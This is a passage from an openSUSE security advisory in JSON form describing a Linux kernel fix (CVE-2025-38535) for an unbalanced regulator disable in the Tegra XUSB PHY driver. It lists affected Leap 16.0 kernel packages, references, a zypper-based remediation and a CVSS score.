"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nphy: tegra: xusb: Fix unbalanced regulator disable in UTMI PHY mode\n\nWhen transitioning from USB_ROLE_DEVICE to USB_ROLE_NONE, the code\nassumed that the regulator should be disabled. However, if the regulator\nis marked as always-on, regulator_is_enabled() continues to return true,\nleading to an incorrect attempt to disable a regulator which is not\nenabled.\n\nThis can result in warnings such as:\n\n[ 250.155624] WARNING: CPU: 1 PID: 7326 at drivers/regulator/core.c:3004\n_regulator_disable+0xe4/0x1a0\n[ 250.155652] unbalanced disables for VIN_SYS_5V0\n\nTo fix this, we move the regulator control logic into\ntegra186_xusb_padctl_id_override() function since it\u0027s directly related\nto the ID override state. The regulator is now only disabled when the role\ntransitions from USB_ROLE_HOST to USB_ROLE_NONE, by checking the VBUS_ID\nregister. This ensures that regulator enable/disable operations are\nproperly balanced and only occur when actually transitioning to/from host\nmode.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38535",
"url": "https://www.suse.com/security/cve/CVE-2025-38535"
},
{
"category": "external",
"summary": "SUSE Bug 1248240 for CVE-2025-38535",
"url": "https://bugzilla.suse.com/1248240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
